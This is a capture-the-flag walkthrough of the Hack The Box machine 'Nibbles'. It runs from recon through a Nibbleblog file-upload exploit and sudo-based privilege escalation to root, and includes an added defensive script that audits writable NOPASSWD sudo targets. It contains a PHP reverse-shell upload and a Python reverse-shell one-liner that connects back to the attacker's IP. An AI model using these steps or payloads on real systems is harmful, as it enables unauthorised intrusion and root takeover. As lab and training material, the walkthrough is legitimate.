# Nibbles

## Reconnaissance

```
# Nmap 7.91 scan initiated Sun Mar 14 00:25:31 2021 as: nmap -sC -sV -p22,80 -oN nibbles.nmap 10.10.10.75
Nmap scan report for 10.10.10.75
Host is up (0.10s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar 14 00:25:42 2021 -- 1 IP address (1 host up) scanned in 11.03 seconds
```

With only SSH and HTTP open, browse to the web server and review the page source.

![](https://4057777515-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MHH7KhyMHFxZjjhb__O%2F-MVicBW3c7_MVSh6gw_2%2F-MVnMEIZfD0agUIGxtdc%2Fimage.png?alt=media\&token=66957b72-a375-4297-8bf5-30a257e1e657)

The next step is to visit the directory referenced in the page source.

![](https://4057777515-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MHH7KhyMHFxZjjhb__O%2F-MVicBW3c7_MVSh6gw_2%2F-MVnMRzEsWoy5zOvgdN3%2Fimage.png?alt=media\&token=8fc1ba02-d1eb-4e81-8637-4c07ed4692c7)

## Found Login

![Found login page](https://4057777515-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MHH7KhyMHFxZjjhb__O%2F-MVicBW3c7_MVSh6gw_2%2F-MVnMhElmKXrP9FGW4wT%2Fimage.png?alt=media\&token=4da29121-c9c5-4369-acf9-880bedbc9f59)

Default credentials did not work, and the login page has a lockout mechanism, so repeated guessing will get you banned. There is not much else here: the password turns out to be nibbles, which has to be guessed from what a system administrator with poor password practice would choose. We'll proceed to finding a username with GoBuster.

## Running GoBuster Scan

```
└─$ gobuster dir --url http://10.10.10.75/nibbleblog/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.75/nibbleblog/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2021/03/14 18:23:03 Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 2987]
/sitemap.php          (Status: 200) [Size: 402] 
/content              (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/content/]
/themes               (Status: 301) [Size: 322] [--> http://10.10.10.75/nibbleblog/themes/] 
/feed.php             (Status: 200) [Size: 302]                                             
/admin                (Status: 301) [Size: 321] [--> http://10.10.10.75/nibbleblog/admin/]  
/admin.php            (Status: 200) [Size: 1401]                                            
/plugins              (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/plugins/]
/install.php          (Status: 200) [Size: 78]                                              
/update.php           (Status: 200) [Size: 1622]                                            
/README               (Status: 200) [Size: 4628]                                            
/languages            (Status: 301) [Size: 325] [--> http://10.10.10.75/nibbleblog/languages/]
```

## Found Username and Version

These were found while browsing the directories that GoBuster discovered.

![](https://4057777515-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MHH7KhyMHFxZjjhb__O%2F-MVicBW3c7_MVSh6gw_2%2F-MVnO8esovV80ndy71Qo%2Fimage.png?alt=media\&token=a3ba3ed6-2d87-4064-8575-153b256dae5f)

![](https://4057777515-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MHH7KhyMHFxZjjhb__O%2F-MVicBW3c7_MVSh6gw_2%2F-MVnOHtt8f0BTYll5yEk%2Fimage.png?alt=media\&token=ba7bba8b-2cc9-4311-8026-e0747e210694)

## Found Exploit

```
└─$ searchsploit nibble
------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                       |  Path
------------------------------------------------------------------------------------- ---------------------------------
Nibbleblog 3 - Multiple SQL Injections                                               | php/webapps/35865.txt
Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit)                                | php/remote/38489.rb
------------------------------------------------------------------------------------- ---------------------------------
```

More information on this exploit can be found here.

{% embed url="<https://packetstormsecurity.com/files/133425/NibbleBlog-4.0.3-Shell-Upload.html>" %}

The exploit is straightforward: log in with the credentials, upload a PHP reverse shell, and trigger it.

## Uploading Shell

Log in through the admin panel (the password is nibbles, as guessed) and upload one of the following shells, edited to point at your Kali IP:

```
re/laudanum/wordpress/templates/php-reverse-shell.php
/usr/share/seclists/Web-Shells/laudanum-0.8/php/php-reverse-shell.php
/usr/share/webshells/php/php-reverse-shell.php
```

They should all suffice, so pick your poison.

![Uploading Shell in My Images](https://4057777515-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MHH7KhyMHFxZjjhb__O%2F-MVicBW3c7_MVSh6gw_2%2F-MVnPdMAuQP-NzMl9kFl%2Fimage.png?alt=media\&token=f1765117-5390-4d47-a018-012a90d03aa9)

Set up your listener and visit the following link.

{% embed url="<http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php>" %}

```
┌──(kali㉿kali)-[~/HTB/Nibbles]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.31] from (UNKNOWN) [10.10.10.75] 52458
Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 18:46:16 up 19 min,  0 users,  load average: 0.00, 0.02, 0.02
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
nibbler
```

Once your connection is established, run `sudo -l` to check which commands you are allowed to run as another user.

```
nibbler@Nibbles:/home/nibbler$ sudo -l 
sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
```

The script that the sudo rule points to does not exist yet, so create the `personal/stuff` directories and a `monitor.sh` file containing a Python reverse shell.

```
nibbler@Nibbles:/home/nibbler/personal/stuff$ vi monitor.sh 

#!/bin/sh

# Connect back to the listener on the Kali host (10.10.14.31 in this write-up), not to the target itself
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.31",7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

Set up your listener on port 7777 and execute the newly created script with sudo.

```
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo ./monitor.sh 
sudo: unable to resolve host Nibbles: Connection timed out
```
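The root of this escalation is a sudoers rule that grants NOPASSWD root execution of a script inside the user's own home directory, where the user (or anyone able to write the parent directory) can replace it. The following POSIX shell audit is an added example for defenders and is not part of the original write-up: it reads `sudo -l` style output, extracts every NOPASSWD command, and flags any whose file or parent directory is writable by the current user. The `demo` function builds a constructed scenario in a temporary directory that mirrors the page's rule shape; the `personal/stuff/monitor.sh` path and the `locked/safe.sh` control entry are constructed for the example.

```shell
#!/bin/sh
# Added example (not from the write-up): audit "sudo -l" output for NOPASSWD
# commands whose target file, or its parent directory, is writable by us.

# Return 0 if the path is writable by the current user. If the file does not
# exist, or its parent directory is writable, the file can still be replaced
# or created, which is the same risk.
is_writable_target() {
    p="$1"
    if [ -e "$p" ]; then
        [ -w "$p" ] && return 0
        [ -w "$(dirname "$p")" ] && return 0
        return 1
    fi
    [ -w "$(dirname "$p")" ]
}

# Read "sudo -l" style output on stdin and print one RISK line per NOPASSWD
# command whose target is writable. Prints nothing when nothing is flagged.
audit_nopasswd() {
    grep 'NOPASSWD:' | while IFS= read -r line; do
        # everything after "NOPASSWD:" is a comma-separated command list
        cmds=${line#*NOPASSWD:}
        old_ifs=$IFS
        IFS=','
        for c in $cmds; do
            # drop leading spaces and any arguments following the command path
            c=$(printf '%s' "$c" | sed 's/^ *//; s/ .*//')
            [ -n "$c" ] || continue
            if is_writable_target "$c"; then
                printf 'RISK: %s is writable by uid %s\n' "$c" "$(id -u)"
            fi
        done
        IFS=$old_ifs
    done
}

# Constructed scenario: one NOPASSWD script under a user-writable directory
# (the write-up's situation) and one control script in a read-only directory.
demo() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/personal/stuff" "$tmp/locked"
    printf '#!/bin/sh\necho monitoring\n' > "$tmp/personal/stuff/monitor.sh"
    printf '#!/bin/sh\necho safe\n' > "$tmp/locked/safe.sh"
    chmod 555 "$tmp/locked/safe.sh" "$tmp/locked"   # read-only for non-root users
    # constructed "sudo -l" output in the same shape as the page's
    printf 'User demo may run the following commands on host:\n    (root) NOPASSWD: %s, %s\n' \
        "$tmp/personal/stuff/monitor.sh" "$tmp/locked/safe.sh" | audit_nopasswd
    chmod -R u+w "$tmp"
    rm -rf "$tmp"
}
```

Run `demo` as an unprivileged user and only the `monitor.sh` entry is reported; a real-world variant would feed it `sudo -l` directly. The fix on the administrator's side is to point such rules only at root-owned, non-writable paths (or drop NOPASSWD entirely), since any writable target turns the rule into a root shell.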

## Getting ROOT

```
└─$ nc -lvnp 7777
listening on [any] 7777 ...
connect to [10.10.14.31] from (UNKNOWN) [10.10.10.75] 36800
# whoami
root
# ls
bakmonitor.sh
monitor.sh
test.py
# cd /root
# ls
root.txt
```
